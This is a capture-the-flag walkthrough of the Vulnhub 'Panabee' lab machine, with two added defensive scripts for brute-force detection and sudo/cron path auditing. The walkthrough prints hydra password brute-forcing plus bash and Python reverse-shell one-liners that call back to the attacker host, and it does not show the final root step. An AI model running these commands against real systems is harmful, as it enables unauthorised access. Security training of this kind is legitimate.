Panabee: identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH
 192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH
Using the netdiscover tool in Kali Linux, the target host's IP address is identified as 192.168.56.228.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
Nmap scan report for bogon (192.168.56.228)
Host is up (0.00011s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
|   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
|_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after:  2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
Service Info: Host: panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: , NetBIOS MAC: (unknown)
| smb2-time: 
|   date: 2023-03-23T11:21:52
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ smbclient //192.168.56.228/note 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 14 23:08:42 2020
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

		20508240 blocks of size 1024. 12823536 blocks available
smb: \> get note.txt 
getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> put test.txt 
putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
  .                                   D        0  Thu Mar 23 07:23:20 2023
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  test.txt                            A       12  Thu Mar 23 07:23:20 2023
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

		20508240 blocks of size 1024. 12823528 blocks available
Files can be uploaded through SMB.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat note.txt 
Dear goper, I'll just leave it here as a note,
Sorry for the late response,
The server will now `backup` you files in your home dir,
go ahead and backup anything you like, server will do it for you.
Please delete this note once you've read for security measure
Is goper a username?
Is there a scheduled task running (periodically backing up files)?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ nikto -h http://192.168.56.228
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.228
+ Target Hostname:    192.168.56.228
+ Target Port:        80
+ Start Time:         2023-03-22 23:25:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
The directory scan yielded nothing, so next hydra is used to crack the password.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.228:21/
[21][ftp] host: 192.168.56.228   login: goper   password: spiderman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
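The hydra run above produced a burst of failed FTP logins from one client followed by a successful one, which is exactly the pattern a log-based detection should catch. The following is an added example (not part of the original walkthrough): a sliding-window counter over vsftpd-style log lines that raises one alert per client address once it passes a failure threshold and records whether that address later logged in successfully. The log lines are constructed to mirror this session (client 192.168.56.146 guessing user goper, plus a constructed unrelated user "alice"); the only assumption is vsftpd's default `FAIL LOGIN` / `OK LOGIN` line format.

```python
"""Flag FTP password-guessing bursts in vsftpd-style log lines.
Added example; the log lines are constructed to mirror the hydra run in the
walkthrough (client 192.168.56.146 guessing user goper), not a captured log."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line shape: vsftpd's default log entry for a login attempt, e.g.
# 'Wed Mar 22 23:38:08 2023 [pid 4120] [goper] FAIL LOGIN: Client "192.168.56.146"'
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)
TS_FMT = "%a %b %d %H:%M:%S %Y"


def parse_line(line):
    """Return (timestamp, user, result, client_ip), or None for lines that are not login events."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group("ts"), TS_FMT), m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """One alert per client IP that produced at least `threshold` FAIL LOGIN
    events inside any `window`. An alert keeps counting later failures and
    records the first successful login from that IP after the burst, which is
    the sign that a password was actually guessed."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, result, ip = parsed
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures that fell out of the window
                q.popleft()
            if ip in alerts:
                alerts[ip]["failures"] += 1
            elif len(q) >= threshold:
                alerts[ip] = {"ip": ip, "first_seen": q[0], "failures": len(q), "success_after": None}
        elif ip in alerts and alerts[ip]["success_after"] is None:
            alerts[ip]["success_after"] = (user, ts)   # OK LOGIN after the burst
    return list(alerts.values())


def build_sample_log():
    """Constructed vsftpd-style lines: 15 guesses two seconds apart from
    192.168.56.146, then a successful login as goper, with one unrelated
    (constructed) client's failed and successful logins mixed in."""
    base = datetime(2023, 3, 22, 23, 38, 8)

    def entry(offset, pid, user, result, ip):
        stamp = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return '%s [pid %d] [%s] %s LOGIN: Client "%s"' % (stamp, pid, user, result, ip)

    lines = [entry(0, 4001, "alice", "FAIL", "192.168.56.50"),
             entry(5, 4002, "alice", "OK", "192.168.56.50")]
    lines += [entry(2 * i, 4100 + i, "goper", "FAIL", "192.168.56.146") for i in range(15)]
    lines.append(entry(40, 4200, "goper", "OK", "192.168.56.146"))
    lines.sort(key=lambda l: parse_line(l)[0])
    return lines


if __name__ == "__main__":
    for alert in detect_bruteforce(build_sample_log()):
        print(alert)
```

With the defaults (10 failures in 60 seconds) the sample log yields a single alert for 192.168.56.146 with 15 counted failures and a `success_after` of goper; the one-off failure from the other client never crosses the threshold. Throttling in vsftpd itself (for example `max_login_fails` and `delay_failed_login`, both of which exist in vsftpd.conf) would stop the burst at the source, but the log-side check still catches a slow guess spread across sessions.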
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228 
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||8003|)
150 Here comes the directory listing.
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..
-rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 Jun 14  2020 .cache
drwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
-rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor
-rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful
-rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo
-rw-r--r--    1 0        1000          332 Jun 15  2020 status.py
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||59411|)
150 Opening BINARY mode data connection for status.py (332 bytes).
100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA
226 Transfer complete.
332 bytes received in 00:00 (2.23 KiB/s)
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13323|)
150 Ok to send data.
100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (8.87 KiB/s)
ftp> 
This appears to be goper's home directory, so an SSH public key can be uploaded to the target host.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in goper
Your public key has been saved in goper.pub
The key fingerprint is:
SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|     . =Xo.      |
|    .o += +      |
|   .o +oo++ o    |
|  o+.+o+oE.=oo   |
|.oo+ooo.S o.==.  |
|....+ . =.oo     |
| . .   +.        |
|  ..             |
|  ..             |
+----[SHA256]-----+

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ls
goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||34675|)
150 Ok to send data.
100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (0.98 MiB/s)
ftp> 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh -i goper goper@192.168.56.228 
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
goper@192.168.56.228: Permission denied (publickey).
But the target does not allow key-based login, so this route is a dead end.
Write a bash script and upload it via FTP, i.e. into goper's home directory, to see whether it gets executed automatically.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat shell.sh 
bash -i >& /dev/tcp/192.168.56.146/5555 0>&1
The bash script must be named backup.sh for cron to execute it.
ftp> put backup.sh 
local: backup.sh remote: backup.sh
229 Entering Extended Passive Mode (|||10215|)
150 Ok to send data.
100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA
226 Transfer complete.
57 bytes sent in 00:00 (45.43 KiB/s)
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
bash: cannot set terminal process group (3520): Inappropriate ioctl for device
bash: no job control in this shell
goper@panabee:~$ pwd
pwd
/home/goper
goper@panabee:~$ ls -alh
ls -alh
total 72K
drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh
-rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history
-rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrc
drwx------ 2 goper goper 4.0K Jun 14  2020 .cache
drwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local
-rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile
-rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor
-rw------- 1 goper goper   57 Mar 23 11:54 shell.sh
drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py
-rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful
-rw------- 1 goper goper   12 Mar 23 11:40 test.txt
-rw------- 1 goper goper  11K Jun 15  2020 .viminfo
goper@panabee:~$ sudo -l
sudo -l
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py
The original status.py can be deleted and a Python reverse-shell script uploaded via FTP in its place; running it through the sudo rule then yields a shell as jenny.
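Both footholds in this section come from the same misconfiguration: something privileged (cron running backup.sh, and sudo running /home/goper/status.py as jenny) executes a file from a directory the low-privileged user controls. status.py is owned by root with mode 644, which looks safe, but the directory /home/goper (drwxrwxr-x goper ftp) lets goper delete the file and drop a replacement, which is exactly what the walkthrough does. The following is an added audit example (not code from the walkthrough or the box): it parses a `sudo -l` rule, checks whether each script path passed to an interpreter can be altered by the invoking user, either directly or via its parent directory, and applies the same check to the cron-executed script. The ownership/mode table is constructed from the listings above (goper is uid 1000, group ftp is gid 118); the "/opt/status" location is a constructed hardened alternative, not something present on the box.

```python
"""Audit privileged execution targets (sudo rules, cron scripts) that live in
paths a low-privileged user can modify. Added example; the filesystem table
below is constructed from the listings in the walkthrough, not read from a host."""
import os
import re
import shlex
from collections import namedtuple

FakeStat = namedtuple("FakeStat", "st_uid st_gid st_mode")
Finding = namedtuple("Finding", "path runas reason")

# Interpreters that run whatever script path they are handed.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "bash", "sh", "node"}

# One line of `sudo -l` output: "(runas) [TAG: ...] command args"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def user_can_modify(st, uid, gids):
    """Can a user with this uid and group set change or replace the object that
    st describes? The owner can always chmod, so ownership alone counts."""
    if uid == 0 or st.st_uid == uid:
        return True
    if st.st_gid in gids and st.st_mode & 0o020:
        return True
    return bool(st.st_mode & 0o002)


def audit_exec_target(path, runas, uid, gids, stat_fn=os.stat):
    """Return a Finding if `path`, executed as `runas`, can be altered by `uid`:
    either the file itself is writable, or its parent directory is, which lets
    the user delete the file and put a replacement in its place."""
    try:
        st_file = stat_fn(path)
        st_dir = stat_fn(os.path.dirname(path))
    except FileNotFoundError:
        return Finding(path, runas, "missing: whoever can create the file controls what runs")
    if user_can_modify(st_file, uid, gids):
        return Finding(path, runas, "file writable by uid %d" % uid)
    if user_can_modify(st_dir, uid, gids):
        return Finding(path, runas, "parent directory writable by uid %d: file can be removed and replaced" % uid)
    return None


def audit_sudo_rule(line, uid, gids, stat_fn=os.stat):
    """Apply audit_exec_target to every absolute path a sudo rule hands to an
    interpreter, e.g. '(jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py'."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError("not a sudo rule: %r" % line)
    argv = shlex.split(m.group("cmd"))
    if not argv or os.path.basename(argv[0]) not in INTERPRETERS:
        return []
    findings = []
    for arg in argv[1:]:
        if arg.startswith("/"):
            f = audit_exec_target(arg, m.group("runas"), uid, gids, stat_fn)
            if f:
                findings.append(f)
    return findings


# Constructed ownership/mode table modelled on the `ls -alh` output in the
# walkthrough; /opt/status is a constructed hardened location for comparison.
SAMPLE_FS = {
    "/home/goper": FakeStat(1000, 118, 0o40775),              # drwxrwxr-x goper ftp
    "/home/goper/status.py": FakeStat(0, 1000, 0o100644),     # -rw-r--r-- root goper
    "/home/goper/backup.sh": FakeStat(1000, 1000, 0o100711),  # -rwx--x--x goper goper
    "/opt/status": FakeStat(0, 0, 0o40755),                   # drwxr-xr-x root root
    "/opt/status/status.py": FakeStat(0, 0, 0o100644),        # -rw-r--r-- root root
}


def sample_stat(path):
    """os.stat stand-in over the constructed table."""
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SAMPLE_FS[path]


WEAK_RULE = "(jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py"
FIXED_RULE = "(jenny) NOPASSWD: /usr/bin/python3 /opt/status/status.py"


def demo():
    """Run the audit as goper (uid 1000, groups goper=1000 and ftp=118)."""
    uid, gids = 1000, {1000, 118}
    return {
        "weak_rule": audit_sudo_rule(WEAK_RULE, uid, gids, sample_stat),
        "fixed_rule": audit_sudo_rule(FIXED_RULE, uid, gids, sample_stat),
        "cron_script": audit_exec_target("/home/goper/backup.sh", "goper", uid, gids, sample_stat),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The weak rule is flagged on the parent directory, not the file, which is the detail a quick `ls -l status.py` misses; moving the script to a root-owned directory such as the constructed /opt/status clears the finding. The cron case is flagged on the file itself: the job runs as goper, so it is not an escalation by itself, but it turns anyone holding goper's FTP password into someone who executes code on the host.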
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ vim status.py 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
goper@panabee:~$ rm -rf status.py
rm -rf status.py
ftp> put status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||26655|)
150 Ok to send data.
100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA
226 Transfer complete.
232 bytes sent in 00:00 (167.32 KiB/s)
ftp> 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
goper@panabee:~$ chmod 777 status.py
chmod 777 status.py
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
jenny@panabee:/home/goper$ cd /home
cd /home
jenny@panabee:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root  root  4.0K Jun 15  2020 .
drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..
drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goper
drwx------  3 jenny jenny 4.0K Jun 15  2020 jenny
jenny@panabee:/home$ cd jenny
cd jenny
jenny@panabee:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jenny jenny 4.0K Jun 15  2020 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history
-rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc
-rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst
-rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile
-rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt
-rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jenny
drwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0
From .bash_history we learn there is a secret.zip file; it was downloaded to the local Kali Linux machine.
But cracking it failed; privilege escalation on this box has to go through .tmux.
Privilege escalation
cd /root
# ls -alh
ls -alh
total 80K
drwx------  5 root root 4.0K Jun 30  2020 .
drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root  18K Jun 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwx------  2 root root 4.0K Jun 14  2020 .cache
-rw-------  1 root root   38 Jun 30  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 14  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root  239 Jun 15  2020 proof.txt
-rw-r--r--  1 root root   66 Jun 15  2020 .selected_editor
drwx------  2 root root 4.0K Jun 14  2020 .ssh
-rw-------  1 root root  13K Jun 21  2020 .viminfo

 __              __   ___  ___
|__) /\  |\ | /\  |__) |__  |__ 
|    /~~\ | \| /~~\ |__) |___ |___
STRIVE FOR PROGRESS, NOT FOR PERFECTION